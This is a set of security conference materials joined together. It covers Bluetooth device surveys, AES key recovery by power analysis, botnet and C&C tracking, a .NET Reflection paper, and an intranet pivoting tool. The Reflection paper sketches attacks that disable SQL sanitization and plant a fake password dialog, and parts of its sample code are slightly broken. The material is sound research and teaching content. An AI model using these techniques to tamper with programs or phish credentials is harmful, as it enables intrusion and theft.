• What moves?
• Prevalence?
• Reoccurrence?
Sunday, July 7, 13
WHATS OUT THERE
• Over 10,000 sightings
2,489
9,362
Sightings
unique sightings
duplicate sightings
Sunday, July 7, 13
MOVEMENT
• Device movement
estimations for devices
seen more than once.
21%
39%
24%
9%
5%
2%
5 km
1 km
0.5 km
0.1 km
0.05 km
stationary
Sunday, July 7, 13
PREVALENCE
• Most common devices
by name.
• Generic names were
removed
Roku Player
DTVBluetooth
BlackBerry 9930
BlackBerry 9900
BSA IdleTV
SGH-T379
BlackBerry 9810
BlackBerry 9360
TVBluetooth
0
23
45
68
90
Sunday, July 7, 13
AWARENESS
• Your devices
• Bugs
• Hidden functionality?
• Security
• Anonymity
Sunday, July 7, 13
YOU
• Participation
• bluetoothdatabase.com/participation
• Tools
• github.com/hackgnar/bluetoothdatabase
• Data
• bluetoothdatabase.com/data
Sunday, July 7, 13
COMING SOON
• Ubertooth Client
• gps + ubertooth
Sunday, July 7, 13
END
- Twitter: @hackgnar
- Web: hackgnar.com
Sunday, July 7, 13 | pdf |
Power Analysis Attacks
能量分析攻擊
童御修1 李祐棠2 JP 2,3 陳君明4,5 鄭振牟1,3
1 國立臺灣大學 電機工程學系
2 國立臺灣大學 電信工程學研究所
3 中央研究院 資訊科技創新研究中心
4 國立臺灣大學 數學系
5 銓安智慧科技 (股)
Agenda
•Introduction
- Attacks on Implementations
- Experiment Setup
•Demo -- Break AES-128
•Power Analysis Attacks
- Foundation
- Example on AES-128
- Workflows
2
Traditional Cryptanalysis
Attackers can only observe the external information
What if we can see insides?
3
Attacks on Implementations
Semi-invasive
Non-invasive
Invasive
Microprobing
Reverse engineering
UV light, X-rays
or lasers
Side-channel
attacks
Attack scope
Cost
Side-channel attacks:
Cheaper & effective
4
Side-Channel Attacks 旁通道攻擊
Attackers analyze the “leakage” from the devices
Different keys cause different leakage!
5
6
Side Channel Attack
旁通道攻擊
AES
Example: Acoustics Cryptanalysis
Adi Shamir (S of RSA) et al, 2013
Execute GnuPG’s RSA-4096
Capture and analyze
Sound
7
Side-Channel Leakages
Timing
Power
EM
Others
ex. Password comparison
Paul Kocher proposed the first attack:
DPA, Differential Power Analysis (1999)
[CRI, Cryptography Research Inc.]
Sound, temperature, …
Similar to power consumption
Power leakage is easier to deal with
8
Experiment Setup
Oscilloscope
Device
Laptop
control signal & input
control signal
output
power traces
measure signal
9
Analyze!
Equipment (1)
PicoScope 3206D with sampling rate 1GSa/s
10
≈NTD 50,000
Equipment (2)
SAKURA evaluation board
UEC Satoh Laboratory
11
≈NTD 100,000
Our Environment
12
Demo
Extract the secret key from AES-128 on SmartCard
Key: 13 11 1d 7f e3 94 4a 17 f3 07 a7 8b 4d 2b 30 c5
13
So Why Power Analysis Succeeds?
14
Foundation of Power Analysis (1)
CMOS technology
NMOS
PMOS
0 1
0 1
15
Foundation of Power Analysis (2)
Power consumption of CMOS inverter
0
1
-> 1
Discharging current
-> 0
-> 0
Charging current
-> 1
Short-circuit current
16
Foundation of Power Analysis (3)
CMOS consumes much more power in dynamic state
Thus we use the power model
Power = a ‧ # bitflips + b
Hamming Weight: HW(101100) = 3
Hamming Distance: HD(0011, 0010) = 1
17
Software Example
Data transferred between memory and CPU
CPU
Memory
value
Bus
# bitflips = HW(value)
18
Hardware Example
Combinational
Logic
Register
# bitflips = HD(statei , statei+1)
= HW(statei ⊕ statei+1)
state0
state1
state1
state2
19
Example: on AES-128
Target intermediate value
The 16 bytes are independent before
MixColumns in the first round
So we can process it byte by byte
20
Divide and Conquer!!
Measuring Power Traces
0x3128A6DA……7C
0xA24B6E1D……97
0x6C7B32C……82
…
Plaintexts
-0.388
0.021
0.734
-0.172
0.053
0.681
0.073
-0.105 0.592
…
…
…
…
Traces
21
0x31
0xA2
0x6C
0x00
0x01
0x02
0xFF
Calculate hypothetical
intermediate value
Sbox (p⊕k)
0xC7
0x37
0x50
0x04
0x0A
0x8B
0x4C
0xDC
…
…
…
…
…
…
0x3C
Plaintexts (first byte)
Key hypothesis (256 kinds)
22
Power model
HW(‧)
5
5
2
1
2
4
3
5
Statistical model
correlation(‧ , ‧)
-0.388
0.021
0.734
-0.172
0.053
0.681
0.073
-0.105 0.592
…
…
…
…
…
…
…
…
4
Traces
23
0.181
0.005 -0.124
-0.103
0.013
0.090
-0.001
-0.131 0.095
…
…
…
…
Correlation coeffieints matrix
Key 0x00
Key 0x01
Key 0xFF
0x13 is the correct key of the first byte !
24
-0.084
0.053
0.372
Key 0x13
…
…
Experimental Results (1)
25
Key: 0x13
Byte 1
Experimental Results (2)
26
Byte 6
Key: 0x94
Experimental Results (3)
27
Byte1
Byte2
Byte3
Byte4
Power Analysis Workflow (1)
Choose the target intermediate value
in the above examples
1. Both input-dependent and key-dependent
2. Better after a permutation function
3. value = f (input, key)
value
statei
28
Power Analysis Workflow (2)
Measure the power traces
Remember to record the corresponding plaintexts
29
Power Analysis Workflow (3)
Choose a power model
• Usually
- HW model in software like SmartCard
- HD model in hardware like ASIC and FPGA
# bitflips = HW(value)
# bitflips = HD(statei , statei+1)
30
Power Analysis Workflow (4)
hypothetical intermediate value and hypothetical
power consumption
For each input, calculate the intermediate value for
all possible keys and apply them to the power model
HW( f (input1, key1))
HW( f (input1, key2))
HW( f (input1, keyn))
…
31
Power Analysis Workflow (5)
Apply the statistic analysis
correlation (measured power, hypo. power)
1. For linear power model, Pearson’s correlation
coefficient is a good choice
2. Other models: difference of means, mutual
information……
32
Workflow Summary
1. Choose the target intermediate value
2. Measure the power traces
3. Choose a power model
4. Calculate the hypothetical intermediate value and
corresponding hypothetical power consumption
5. Apply the statistic analysis between measured
power consumption and hypothetical power
consumption
33
Remarks (1)
Many other power analysis attacks
•Simple power analysis type
- Template attacks
•Differential power analysis type
- Correlation power attacks (our attack)
- High-order side-channel attacks
- Mutual information analysis
- Algebraic side-channel attacks
34
Remarks (2)
Countermeasure: Hiding
•Break the link between power and processed values
- Dual-rail precharge logic cell
- Shuffling
- Parallel computing
35
DRP cell
a
a’
b
b’
a+b
(a+b)’
S1
S2
S3
S15
…
S16
S11
S3
S7
S6
S14
S1
S2
S16
…
Pros: easy to implement
Cons: overhead, relationship still exists
Remarks (3)
Countermeasure: Masking
•Generate random numbers to mask the variables
Pros: provably secure
Cons: overhead, implementation issues
36
function
mask process
⊕
P
M
Q
M’
⊕
Q
P⊕M
Q’
Remarks (4)
From theory to reality
•Need knowledge of the devices
- Algorithms
- Commands
- Implementations
•Different attack scenario
- Known plaintext/ciphertext
- Known ciphertext
- Chosen plaintext
37
Conclusions
•A practical threat against SmartCards, embedded
devices and IoT (Internet of Things) chips
•We provide a platform to
evaluate/attack on those
cryptographic devices
•Future study
- different ciphers
- different devices
- new countermeasures
38
References
•S. Mangard et al. Power Analysis Attacks.
•SAKURA project:
http://satoh.cs.uec.ac.jp/SAKURA/index.html
•DPA contest: http://www.dpacontest.org/home/
•E.Brier et al. Correlation Power Analysis with a
Leakage Model.
•Papers from CHES, Eurocrypt, Crypto and Asiacrypt
39
Thank you !
40 | pdf |
$ whoami
b1t<[email protected]>
GitHub/Twitter @zom3y3
#Pentest #C #Antivirus #Python #Botnet #DDoS
TO BE A MALWARE HUNTER!
Attention !
以下言论仅代表个人观点,与任何组织和其他个人没有任何关系
本议题数据纯属虚构,如有雷同纯属巧合
Outline
•
为什么研究僵尸网络?
•
僵尸网络识别、监控技术分享
•
Silver Lords黑客组织追踪分析
为什么研究僵尸网络
•
解决思路:封IP+杀进程
从哪里开始
•
2014年底,当我在阿里云每天需要解决30个“恶意主机”工单的时候…
怎么解决?
ACM(恶意软件追踪系统)
F2M
H2M
S2M
自主杀毒软件设计(FindMalware)
进程检测
流量检测
恶意主机项目
恶意进程
恶意IP
FindMalware
简介:
FindMalware是一款用C/C++语言编写,覆盖Windows和Linux平台的恶意软件追踪
工具。其以PE、ELF 代码段哈希值作为静态特征检测恶意软件,并获取进程socket通信
提取恶意软件CNC。除此之外它也集成了信息采集器功能,能够采集主机文件、进程、网
络等信息,并配合云端数据分析平台进行高级威胁检测。
项目地址:https://github.com/zom3y3/findmalware
• ELF
• PE
可执行文件
•进程模块
•父进程
进程检测
• socket
进程通信
•文件信息
•进程信息
•网络信息
信息采集
• 信息上报
威胁源监控
•人肉添加
•漏报机制
•VT等平台
•网络爬虫
•ClamAV
病毒库
•病毒特征库
•基本行为
•进程通信
病毒识别
•提取CNC
•TCP/UDP
进程通信
•文件hash追踪
•网络流量追踪
•PoC追踪
信息追踪
•
410万自主病毒库
•
集成多款AV
•
30秒/台
•
9个月
•
50个中控/天
•
病毒检出率95%
•
XX重大案件
Now !
僵尸网络威胁情报项目规划
情报搜集平台
分布式蜜罐
系统
情报订阅系
统
情报分析平台
C&C自动
化监控系统
僵尸网络关
联分析系统
情报分
发平台
僵尸网络威
胁情报平台
Honeypot
蜜罐系统是作为
情报搜集平台一
个主要部分,其
主要目的是搜集
主流的PoC,恶
意软件样本,恶
意下载源等。
利用MHN进行分布式蜜罐部署
利用MHN进行分布式蜜罐部署
利用MHN进行分布式蜜罐部署
CNC Command Tracking
CNC监控系统是
作为情报分析平
台一个主要部分,
其主要目的是逆
向分析主流僵尸
网络通信协议,
并监控其攻击指
令。
https://github.com/ValdikSS/billgates-botnet-tracker
挑选Linux/Setag.B.Gen样本(80d0cac0cd6be8010819fdcd7ac4af46)
作为本次测试对象
挑选Linux/Setag.B.Gen样本(80d0cac0cd6be8010819fdcd7ac4af46)
作为本次测试对象
•
C&C提取
•
C&C探活
•
C&C分类
•
C&C通信协议解密
•
C&C监控
•
C&C提取
•
C&C探活
•
C&C分类
•
C&C通信协议解密
•
C&C监控
•
C&C提取
•
C&C探活
•
C&C分类
•
C&C通信协议解密
•
C&C监控
利用Splunk进行简单的数据分析
利用Splunk进行简单的数据分析
利用Splunk进行简单的数据分析
利用Splunk进行简单的数据分析
SmartQQ Group Message Tracking
SmartQQ在线WebQQ网页
平台,是腾讯在WebOS云平
台上推出的一款单纯的聊
天工具,通过逆向分析
SmartQQ通信协议,可以
实现QQ群上的黑产监控。
项目地址:https://github.com/zom3y3/QQSpider
Silver Lords
2014年12月31号,我
通过分析一个ftpBrute
恶意代码追踪到一个巴
西黑客组织Silver
Lords,并通过xss漏洞
进入Silver Lords 黑
产平台.
主要成员:
Al3xG0
Argus
Ankhman
Flythiago
nulld
…
《AWLOOKWINSIDEWTHEWBRAZILIANWUNDERGROUND》
•
近3 W FTP 站点
•
70 个政府系统
•
N个NASA站点
•
1000+ Cpanel
•
7000+ c99shell
•
62WWCPF(巴西税卡)
Silver Lords组织分析
SilverWLords
ftpBrute
painel.cyberunder.org/painel.p
hp
客户端:FtpBrute.pl
cPanle
painel.cyberunder.org/cpanel.
php
疑似cPanle数据泄露
c99shell
painel.cyberunder.org/c99shell
.php
客户端:C99webshell
phpbot
pbotcyberunder.org:443
客户端:phpbot.php
shellbot
irc.silverlords.org:443#nmap
客户端:shellBot.pl
CPF
painel.cyberunder.org/dados.p
hp
疑似CPF数据泄露
What’s the meaning of hacking ?
Enjoy Hacking !
EXPLORE EVERYTHING,EXPLOIT EVERYTHING!
T
H
A
N
K
S
[ b1t@KCon ] | pdf |
REFLECTION’S HIDDEN POWER
“MODIFYING PROGRAMS AT RUN-TIME”
By J~~~~~~~ M~~~~~~
5/27/08
i
Contents
Contents
......................................................................................................................................................
ii
Abstract
......................................................................................................................................................
iv
Glossary
.......................................................................................................................................................
v
Introduction
................................................................................................................................................
vi
Implementation of Reflection Manipulation
................................................................................................
1
Real Life Usage: Reflection 101
..................................................................................................................
2
Implementing Reflection
.............................................................................................................................
4
Load an Assembly
....................................................................................................................................
4
Getting the Types From an Assembly
......................................................................................................
4
Getting and Invoking Constructor of an Object Type
..............................................................................
4
Traversing Instantiated Objects
..............................................................................................................
6
Invoking Functionality on an Object
........................................................................................................
6
Change the Values of an Object
...............................................................................................................
7
The DotNet World: From System Process to Class Level
...........................................................................
8
High Level View: What Can Reflections Do and What Is It?
......................................................................
9
How to Navigate to a Specific Object
........................................................................................................
10
How to Access the Form Object
................................................................................................................
11
New Vectors: Access by Reflection
........................................................................................................
12
Limitations and Brick walls
.....................................................................................................................
12
Demo Attacks
............................................................................................................................................
13
The SQL Injection
...................................................................................................................................
13
The Social Engineering Vector
...............................................................................................................
14
Conclusion
.................................................................................................................................................
15
ii
Illustrations
Figure 1 . Code - Common Flags.............................................................................................................2
Figure 2 . Code - Build Instance Flag .....................................................................................................2
Figure 3 . Code - Build Static Flag .........................................................................................................2
Figure 4 . Code - Load Assembly ...........................................................................................................4
Figure 5 . Code - Gain Access to Types in Assembly..............................................................................4
Figure 6 . Code - Get and Load Constructor of an Object........................................................................5
Figure 7 . Code - Traversing Objects.......................................................................................................6
Figure 8 . Code - Invoking Functionality on Objects...............................................................................6
Figure 9 . Code - Change Values on Objects...........................................................................................7
Figure 10 . Image - System Process Overview...........................................................................................8
Figure 11 . Image - System Process Overview Alternate Implementations ...............................................8
Figure 12 . Code - DotNet Call to Get Forms..........................................................................................11
Figure 13 . Code - System Call to Get Forms..........................................................................................11
Figure 14 . Code - Demo SQL Injection..................................................................................................13
Figure 15 . Code - Demo Social Engineering..........................................................................................14
iii
Abstract
This paper will demonstrate using Reflection to take control over a DotNet (.Net)
compiled code. The focus of this paper will be on how to use Reflection to navigate and gain
access to values and functionality that would normally be off limits. This paper will be geared
for any DotNet programmer (focus will be in C#). No special knowledge of Reflection is
necessary. The basic concept of Reflection and DotNet will be given, along with some light
training on using reflection. This paper is written for the DotNet v2.0 and v3.5 versions of
DotNet. Examples will be given on attacks, like forcing a program to change values and execute
functionality.
iv
Glossary
AppDomain -
Assembly -
.GetType() –
UML -
The DotNet AppDomain is equivalent to a process. It provides separation and
protection between AppDomains. This is typically a separation between code
that has independent execution. Ex. Say ‘void Main()’ has crashed, the program
can still report the problem and try to recover with a secondary AppDomain.
The DotNet Assemblies contain the definition of types, a manifest, and other
meta-data. Standard DotNet Assemblies may or may not be executable; they
might exist as the .EXE(Executable) or .DLL(Dynamic-link library).
Is a function that is inherited from Object in DotNet. It returns the System.Type
for the object it is called on.
Is an acronym for Unified Modeling Language, it is a graphical language for
visualizing, specifying, constructing, and documenting the artifacts in software.
v
Introduction
Subject
Reflection grants access to a meta level of programs. This paper will look at how to use
Reflection to gain access and control over an outside .EXE or .DLL. Reflection makes it possible
to gain access to private and protected areas of a program, as well as directly modifying most any
variable or trigger functionality.
Purpose
This paper is a resource for programmers researching Reflection. This report will give the
reader a basic concept of Reflection and some example code to play with. It will give an
overview of Reflection and in-depth usages in “real world settings.”
Scope
This paper will cover Reflection on managed DotNet specifically at Run-Time.
Over View
This paper will start off by covering how to use Reflection to manipulate a compiled
program. It will cover some basic parts of reflection; some example code will be given. Some
supporting background information on DotNet and Reflection will be provided. Afterwards we
get to direct attacks opened up by Reflection
vi
Implementation of Reflection Manipulation
The first step in a Reflection attack is loading the outside codebase. This is done by
loading the Assembly from an .EXE or .DLL into an accessible AppDomain, which will grant
easy access.
The second step will be finding the object types in the program. This will grant access to
launch constructors, access static objects, and invoke static functions.
The third step, depending on the targeted outcome, is to run the program on its normal
path. To do this get the common entry point of “void Main()” and invoke it.
The fourth step is gaining access to the part of the program to be controlled. Most of the
time this will be an instance object that will need to be found by traversing between instance
objects to get a reference. This can be extraordinarily difficult.
The fifth step is impacting changes. This is normally accomplished by setting a value or
invoking some specific functionality on an object.
Some optional parts to this sequence are:
•
Re-code “void Main()” to take complete control over the program’s entry point.
•
Load the target compiled code base into a different AppDomain.
•
Access the Form object(s) and take over the GUI.
As with any endeavor, knowing the lay of the land is invaluable. After reading over the
code base and/or looking at the UML, an experienced programmer should be well equipped to
move around inside and control the target program. Also Sequence diagrams can also come in
handy as they show a specific execution path.
1
Real Life Usage: Reflection 101
One of the basic tasks for Reflection is changing a value on an object. To do this simply
do a GetType on the target instance object-- access its fields with GetFields and do a SetValue on
the target field.
By doing a GetType on an object it will return a System.Type. This can then be used to
gain access to fields, methods, attributes, and more. The main trick to using these functions and
most of Reflection is setting the flags on the requests.
Some flags commonly used are:
System.Reflection.BindingFlags.Instance = retrieve from the instance part of an object
System.Reflection.BindingFlags.Static = retrieve from the static area of object type
System.Reflection.BindingFlags.NonPublic = retrieve non-public items
System.Reflection.BindingFlags.Public = retrieve public items
System.Reflection.BindingFlags.FlattenHierarchy = retrieve from derived classes
Figure 1 . Code - Common Flags
The flags are constructed by an OR operation as they are an enumeration type.
This is a demo flag built to access material on an instance object that is public and
non-public as well as material from its derived classes. Example below:
System.Reflection.BindingFlags flag = System.Reflection.BindingFlags.Instance |
System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Public |
System.Reflection.BindingFlags.FlattenHierarchy;
Figure 2 . Code - Build Instance Flag
This is a demo flag built to access material on a static object that is public and non-public
as well as material from its derived classes. Example below:
System.Reflection.BindingFlags flag = System.Reflection.BindingFlags.Static |
System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Public |
System.Reflection.BindingFlags.FlattenHierarchy;
Figure 3 . Code - Build Static Flag
To get the Fields for an object it would be:
objectIn.GetType().GetFields(flag);
To get the Methods for an object it would be:
objectIn.GetType().GetMethods(flag);
Flags do not cancel each other out, so it is ok to do a request for instance and static or
public and non-public on the same flag.
2
Implementing Reflection
Some key parts to Reflection are: load an Assembly, getting the types from an Assembly,
getting and invoking constructors of an object type, traversing instantiated objects, invoking
functionality on an object, and changing the values of an object.
Load an Assembly
public static System.Reflection.Assembly LoadAssembly(string filePath)
{
System.Reflection.Assembly AM = System.Reflection.Assembly.LoadFile(filePath);
return AM;
}
Figure 4 . Code - Load Assembly
Getting the Types From an Assembly
public static System.Type[] LoadAssembly(System.Reflection.Assembly assemblyIn)
{
myAssembly = assemblyIn;
System.Type[]typesInAssembly = null;
typesInAssembly = GetTypesFromAssembly(myAssembly);
return typesInAssembly;
}
Figure 5 . Code - Gain Access to Types in Assembly
Getting and Invoking Constructor of an Object Type
public static object LoadObject(System.Type theType)
{
System.Reflection.ConstructorInfo[] ConstructorList = GetConstructors(theType);
//pick the default constructor from the list, some times it will be 0
System.Reflection.ConstructorInfo defaultConstructor = ConstructorList[0];
return LoadConstructor(defaultConstructor, new object[]{});
}
public static System.Reflection.ConstructorInfo[] GetConstructors(System.Type theType)
{
return theType.GetConstructors();
}
public static object LoadConstructor(System.Reflection.ConstructorInfo theConstructor, object[] param)
{
return theConstructor.Invoke(param);
}
Figure 6 . Code - Get and Load Constructor of an Object
3
Traversing Instantiated Objects
public static object GetSubObject(object objectIN)
{
System.Reflection.FieldInfo[] fields = ReflectionPower.GetFields(objectIN, true);
// select fields[0], most of the time you will not pick [0]
System.Reflection.FieldInfo field = fields[0];
// return the value object for the field
return field.GetValue(objectIN);
}
public static System.Reflection.FieldInfo[] GetFields(object objectIn, bool ShowPrivate)
{
System.Reflection.BindingFlags flag = System.Reflection.BindingFlags.Instance |
System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Public;
if (ShowPrivate)
return objectIn.GetType().GetFields(flag);
else
return objectIn.GetType().GetFields();
}
Figure 7 . Code - Traversing Objects
Invoking Functionality on an Object
public static object CallFunctionalityOnObject(object objectIN)
{
System.Reflection. MethodInfo [] methods = ReflectionPower. GetMethods (objectIN, true);
// select methods[0], most of the time you will not pick [0]
System.Reflection. MethodInfo method = methods [0];
// This the a list of parameters to pass into the function
object[] params = new object[]{};
// pick the method to Invoke, pass the object to Invoke it on, pass the parameters
return LoadMethodStatic (method , objectIN, params);
}
public static System.Reflection.MethodInfo[] GetMethods(object objectIn)
{
return objectIn.GetType().GetMethods();
}
public static object LoadMethodStatic(System.Reflection.MethodInfo methodIN, object objectIn, object[] param)
{
return methodIN.Invoke(objectIn, param);
}
Figure 8 . Code - Invoking Functionality on Objects
4
Change the Values of an Object
public static void ChangeSomeValue(object objectIN, object valueIN)
{
System.Reflection.FieldInfo[] fields = GetFields(objectIN, true);
// pick the field you wish to change
System.Reflection.FieldInfo aField = fields[0];
aField.SetValue(objectIN, valueIN);
}
public static System.Reflection.MemberInfo[] GetFields(object objectIn, bool ShowPrivate)
{
System.Reflection.BindingFlags flag = System.Reflection.BindingFlags.Instance |
System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Public;
if (ShowPrivate)
return objectIn.GetType().GetFields(flag);
else
return objectIn.GetType().GetFields();
}
Figure 9 . Code - Change Values on Objects
5
The DotNet World: From System Process to Class Level
The AppDomain is the main boundary in DotNet. A normal DotNet process contains an
AppDomain. Inside of an AppDomain lives Assemblies-- an Assembly is a complete code base
and resource structure. Inside of an Assembly is where Classes and NameSpaces exist along with
most other features that make up a program.
Diagram of a System Process with an AppDomain, Assembly, and Class:
Figure 10 . Image - System Process Overview
AppDomains are self contained. They can crash and not take down the process they live
in or a neighboring AppDomain. AppDomains are the main place DotNet segments memory. The
way this was implemented is similar to how operating systems segment memory for processes.
More than one AppDomain can be loaded into a process and more than one Assembly can
be loaded into an AppDomain. Once an Assembly is loaded it cannot be unloaded except by
unloading the AppDomain it is in. Cross Appdomain memory access is limited by DotNet.
Some Alternate Diagrams of Loading AppDomains and Assemblies:
Multiple AppDomain in a Process
Multiple Assemblies in a AppDomain
Figure 11 . Image - System Process Overview Alternate Implementations
6
AppDomain
Assembly
Class – Code
System
Process
High Level View: What Can Reflections Do and What Is It?
Reflection can impact code by opening an object or code base and giving access to its
values and functionality. This can allow a programmer to interact with compiled programs, in
order to cause the target program to act in different ways, such as sending commands to the
Database that should not be sent or adding an interface to help blind people use the program. The
power of reflection can force a program to interface, to give up or change its information, or to
activate its functionality.
Reflection can impact the target program solely in memory. This allows for control over
the target program with a minimal footprint on the target program. Also in the DotNet framework
Reflection is directly under the System NameSpace, so it should be in every project by default.
7
How to Navigate to a Specific Object
The object-web, formed by a program at run time can make even the craziest UML look
tame. With Reflection we navigate the tangled-web of objects and gain the ability to make
change. Having access to the decompiled code base is not necessary, but a map always helps.
The decompiled code base can help in developing a path out to the target object or in finding
chinks to help gain references deeper into the target program.
After a program is loaded and Reflection has access, the best place to start is by getting a
form object and working back from that. Another possibility is working back from a static object.
Events and Delegates can also be valuable in this endeavor. Events and Delegates can be
modified to lay traps that can gain a reference to an object as it fires an Event or Delegate. Also it
is possible to look at what is hooked to an Event or targeted by Delegates to gain information
from that.
If the program is nice enough to grant one, a normal API can also be a place to hitch into
the program. This will help to quickly get deep into the programs instance object structure.
Every program is different so no one approach is best, some programs will be easy to
infiltrate and others difficult. Regardless of how it is done, with some skill or luck, once the
target object is found it should be easy to impact the desired changes or access needed
information.
8
How to Access the Form Object
Two easy ways to get form objects is with a DotNet call or a system call. The DotNet
OpenForms call returns a formCollection. With the windows system call it returns window
handles. Note that the window handles can reference forms that cannot be accessed.
DotNet Call to System.Windows.Forms.Application.OpenForms:
Public System.Windows.Forms.Control[] GetWindowList()
{
System.Collections.Generic.List<System.Windows.Forms.Form> formList = new List<System.Windows.Forms.Form>();
foreach (System.Windows.Forms.Form f in System.Windows.Forms.Application.OpenForms)
{
formList.Add(f);
}
return formList.ToArray();
}
Figure 12 . Code - DotNet Call to Get Forms
Windows System Call to “user32.dll”->EnumWindows:
[System.Runtime.InteropServices.DllImport ("user32.dll")]
private static extern int EnumWindows(EnumWindowsProc ewp, int lParam);
[System.Runtime.InteropServices.DllImport ("user32.dll")]
private static extern bool IsWindowVisible(int hWnd);
//delegate used for EnumWindows() callback function
delegate bool EnumWindowsProc(int hWnd, int lParam);
public static System.Windows.Forms.Control[] myWindows()
{
System.Collections.Generic.List<System.Windows.Forms.Control> WList;
WList = new System.Collections.Generic.List<System.Windows.Forms.Control>();
// Declare a callback delegate for EnumWindows() API call
EnumWindowsProc ewp = new EnumWindowsProc(delegate(int hWnd, int lParam)
{
System.Windows.Forms.Control aForm;
aForm = System.Windows.Forms.Form.FromChildHandle((IntPtr)hWnd) as System.Windows.Forms.Control;
// Check if form object is not null
if (f != null)
WList.Add(f);
return (true);
});
// Call DllImport("user32.dll") to Enumerate all Windows
EnumWindows(ewp, 0);
// Send Forms back
return WList.ToArray();
}
Figure 13 . Code - System Call to Get Forms
9
The New Rules Under Reflection
New Vectors: Access by Reflection
The attack vector opened by Reflection is at Run-Time. With Reflection it is possible to
delve into a code base and Run “void Main()” or drop down into its class structure and create a
single object to wield as you wish.
Since Reflection is not decompiling, it can have a more automated and faster integration
time with the target code base along with less of a foot print.
Reflection can easily add functionality to a preexisting code base. No longer do programs
have to be written with extensibility in mind or accessible technology to integrate.
Because Reflection does not impact the code base it can get past CRC checks and code
signing.
Limitations and Brick walls
Some road blocks to using Reflection are: It is necessary for the target to be a DotNet
application. Reflection also is limited by memory access rights imposed by the operating system.
Objects need to have a proper reference to be accessed. Programs can also be constructed with
countermeasures that could be triggered if they detect an intrusion.
Once access to the code base is gained with Reflection getting to the target object maybe
harder than one might think; because normally we are the programs designer easily keeping
references to important objects, but as we are coming into another programmer’s world with
Reflection manipulation we have to find each object by hand.
10
Demo Attacks
Reflection can augment some of the old attacks with new powers. I will demonstrate the
attacks of a SQL Injection and Social Engineering.
The SQL Injection
SQL Injection, is sending commands to a DB that should not be sent. This SQL Injection
will be on a client side app, the app would normally sanitize the commands before they are sent.
Normally with Reflection we would not need to do SQL Injection at all, as we could send any
SQL we wish; but for the sake of this demo we will disable the SQL Injection cleaning
mechanism, and make it vulnerable to SQL Injection.
Demo - SQL Injection
Load target code
Find SQL Object
Find SQL cleaning thing
Disable SQL cleaning
Figure 14 . Code - Demo SQL Injection
11
The Social Engineering Vector
Users currently do not expect a client side app to lie to them and trick them into divulging
critical information. After taking over a program this attack will pop-up a fake window and lock
the program until the user enters critical data. Preferably this would be best done at a logical
choke point in the program such as on file access or DB connection.
Demo - Social Engineering
“Load target code”
System.Reflection.Assembly AM = System.Reflection.Assembly.LoadFile(fileOn);
AM.ModuleResolve += new System.Reflection.ModuleResolveEventHandler(AM_ModuleResolve);
System.AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(CurrentDomain_AssemblyResolve);
Find an object in a critical area
“Find an event to add password request”
System.Reflection.FieldInfo FI = xObject.GetFields(objIN, true);
string targetName = "saveFileEvent";
System.Reflection.FieldInfo targetField;
foreach (System.Reflection.FieldInfo FI in aReflectorPower.GetFields(objIN, true))
{
if (targetField.Name == targetName)
{
targetField = FI;
break;
}
}
Make a copy of the event targets
Put call to fake password Form in event
Put the copied event targets back in the event
Figure 15 . Code - Demo Social Engineering
12
Conclusion
With Reflection we have the potential to take control of a program and enact changes that
are outside of the original creator’s scope. Reflection can be used for good or evil by granting
flexibility and adaptability, however it is used it opens previously closed doors. No longer are
programmers subservient to programs if they can reach in and manipulate objects using
Reflection.
Reflection is simple with few requirements and has a small footprint. This makes it a
good choice for small changes to a compiled program.
Suggested Additional readings:
White Paper: Advanced Programming Language Features for Executable Design Patterns “Better
Patterns Through Reflection”
ftp://publications.ai.mit.edu/ai-publications/2002/AIM-2002-005.pdf
White Paper: An Introduction to Reflection-Oriented Programming
http://www.cs.indiana.edu/~jsobel/rop.html
13 | pdf |
© 2011 绿盟科技
www.nsfocus.com
nsfocus.com
www.nsfocus.com
nsfocus.com
如何打造一款内网穿梭的利器
安全服务部 ---- 曲文集
引子
引子
它在这里
http://www.rootkiter.com/EarthWorm
引子
它的功能有
a) 端口转发(可团队协同)
b) 多平台支持
c) 和本地测试工具联动
d) 便携式
http://www.rootkiter.com/EarthWorm
引子
它的功能有
a) 端口转发(可团队协同)
b) 多平台支持
c) 和本地测试工具联动
d) 便携式
http://www.rootkiter.com/EarthWorm
议题主线:
WHY And
HOW
1 内网中的那些坑
3 一些思考
2 如何填坑
目录
内网中的那些坑
1、网络复杂 (LAN->WAN)
有一种坑,叫做:你已经在内网中,我却在内网的子网中
日日见君,君却不识我。
路由器
192.168.xx.xx
墙
10.xx.xx.xx
内网中的那些坑
1、网络复杂 (WAN->LAN)
另一种坑,叫做:你天天来找我玩,我却还不知道你家在哪。。。
你娘让我喊你回家吃饭噻,但问题是你在哪呢???
路由器
192.168.xx.xx
墙
10.xx.xx.xx
内网中的那些坑
2、主机复杂(外表)
这叫做: 林子大了什么鸟都有
内网中的那些坑
2、主机复杂(内在)
这叫做: 林子大了什么鸟都有,Too。
内网中的那些坑
3、内网带宽有限(远程桌面嵌套起来会很卡)
内网中的那些坑
1. 端口转发(正向、反向自由切换)
2. 支持常见的操作系统和处理器
3. 自身要够小,且无需额外的环境依赖
4. 可以直接和测试机工具联动
(网速限制,传工具很费事)
3 一些思考
1 内网中的那些坑
目录
2 如何填坑
如何填坑
1.
端口转发(正向、反向自由切换)
A) 正向端口转发很简单。有新连接就新建连接即可,时序图如下:
如何填坑
1.
端口转发(正向、反向自由切换)
B) 反向的端口转发,就需要控制下游节点新建用于数据交互的隧道。
如何填坑
2. 支持常见的操作系统和处理器
运行环境???
特殊设备???
(OpenWrt,TPLink)
如何填坑
2. 支持常见的操作系统和处理器
可以生成原生代码,
且都是跨平台库
成品会依赖很多dll文件。
在一些嵌入式设备下,
支持不够完美。
如何填坑
2. 支持常见的操作系统和处理器
可以生成原生代码,
且都是跨平台库
成品会依赖很多dll文件。
在一些嵌入式设备下,
支持不够完美。
如何填坑
2. 支持常见的操作系统和处理器
如何填坑
3. 自身要够小,且无需额外的环境依赖
如何填坑
4. 可以直接和测试机工具联动
从网络逻辑上进入目标网段
A. VPN 实现上存在一定难度
B. 利用代理服务来达到这一效果
如何填坑
4. 可以直接和测试机工具联动
常见的代理协议:
HTTP
SSL
FTP
SOCKS
如何填坑
4. 可以直接和测试机工具联动
常见的代理协议:
HTTP
SSL
FTP
SOCKS
这里有一篇协议细则:
http://www.rfc-editor.org/rfc/rfc1928.txt
